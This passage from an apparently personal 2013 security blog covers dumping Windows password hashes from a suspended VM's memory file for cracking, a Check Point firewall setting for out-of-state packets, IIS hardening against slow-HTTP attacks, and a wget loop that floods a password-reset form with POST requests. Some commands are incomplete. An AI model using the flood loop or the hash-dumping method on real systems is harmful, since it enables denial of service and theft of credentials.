Sunday, February 17, 2013

Examining a Suspended Virtual Machine

I would like to show the danger of suspended virtual machines, with the tool called volatility there are several options you may extract from a vmem file can be found from the link below
With in the example , we will find the local password for the related OS User
To use hashdump, pass the virtual address of the SYSTEM hive as -y and the virtual address of the SAM hive as -s, like this

Hashes can now be cracked using John the Ripper, rainbow tables, etc
In this example I have used password appeared with in few minutes

Illegal post SYN packet

Symptoms : fw ctl zdebug shows drops like: _tcstate_update Reason: Illegal post SYN packet;

Any packet from the Client other than SYN or RST, is considered as a security issue, fw thinks that the Client tries to send packets before the Server has responded to the initial request SYN
In order to allow such unexpected packets, enable the related kernel parameter on the Security Gateway.

Check the mechanism with,
# fw ctl get int fw_allow_out_of_state_post_syn

# fw ctl set int fw_allow_out_of_state_post_syn 1        activate on the fly
# fw ctl set int fw_allow_out_of_state_post_syn 0        deactivate on the fly

If it helps to resolve the issue it's time to make it persistent after a reboot
Create the $FWDIR/boot/modules/fwkern.conf file, if it does't exist.This file is not present by default

[Expert@testfw]# cd $FWDIR/boot/modules/
[Expert@testfw]# pwd
[Expert@testfw]# vi fwkern.conf


define it with its hex value

Wednesday, February 6, 2013

IIS Tunning Recommendations against Slow http Attacks

If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service.
A single attacker can take down victim web server with minimal bandwidth.

Limit request attributes is through the RequestLimits element, specifically the maxAllowedContentLength, maxQueryString, and maxUrl attributes

maximum URL length: 2KB by specifying 2048.
maximum query string length : 1KB by specifying 1024.
Deny access to unlisted HTTP verbs by clearing the Allow unlisted verbs check box.

Set headerLimits to configure the type and size of header your web server will accept.

Content-type: 100 bytes

Tune the connectionTimeout, headerWaitTimeout, and minBytesPerSecond attributes of the limits and WebLimits elements to minimize the impact of slow
HTTP attacks.

connectionTimeout: 30sec
headerWaitTimeout: 30sec
minBytesPerSecond: 250


Web Limits

Saturday, January 12, 2013

Lets do Some HTTP Post Flood

This tool allows you to edit and replicate HTTP parameters after the request finally leaves your browser.
Its for educational purposes only.The aim of this tool is to show the wget usage.
Can be downloaded at

File Named: HTTP Flooder v1.0 Uses
It Uses wget.exe located at c:\ drive, Creates an HTML file of the HTTP response at the directory where it runs.

Example Usage: Before running it,sniff the traffic with a local proxy like webscarab and copy/paste the final request data to flood.

For Linux Users,
Example of a simple bash script, will do a 100 post request

for i in {1..100};
wget --user-agent=Firefox/10 --referer= --post-data="__VIEWSTATE=%2FwEPDwULLTExMjU2MzY2MjcPZBYCAgMPZBYSAgMPDxYCHgRUZXh0BQxVc2VyIE5hbWUgOiBkZAIFDw8WBB8ABQR0ZXN0HgdFbmFibGVkaGRkAgcAPDxYCHgdWaXNpYmxlaGRkAgkPDxYCHwJoZGQCDQ8PFgIfAmdkZAIPDw8WB9B8ABQR0ZXN0HwJnZGQCEQ8PAFgIfAmdkZAITDw8WAh8CZ2RkAhUPDxYCHwJnZGRk8Nl1HK2Uc%2B9sUZwQEPNDjmgqRms%3D&__EVENTVALIDATION=%2FwEWBAK41KgrAuzRsusGAuzR9tkMArursYYIKiocz95qxVisTmMDLVdMhHxNkYk%3D&Email=test&Button=Send+Password" --no-check-certificate --no-dns-cache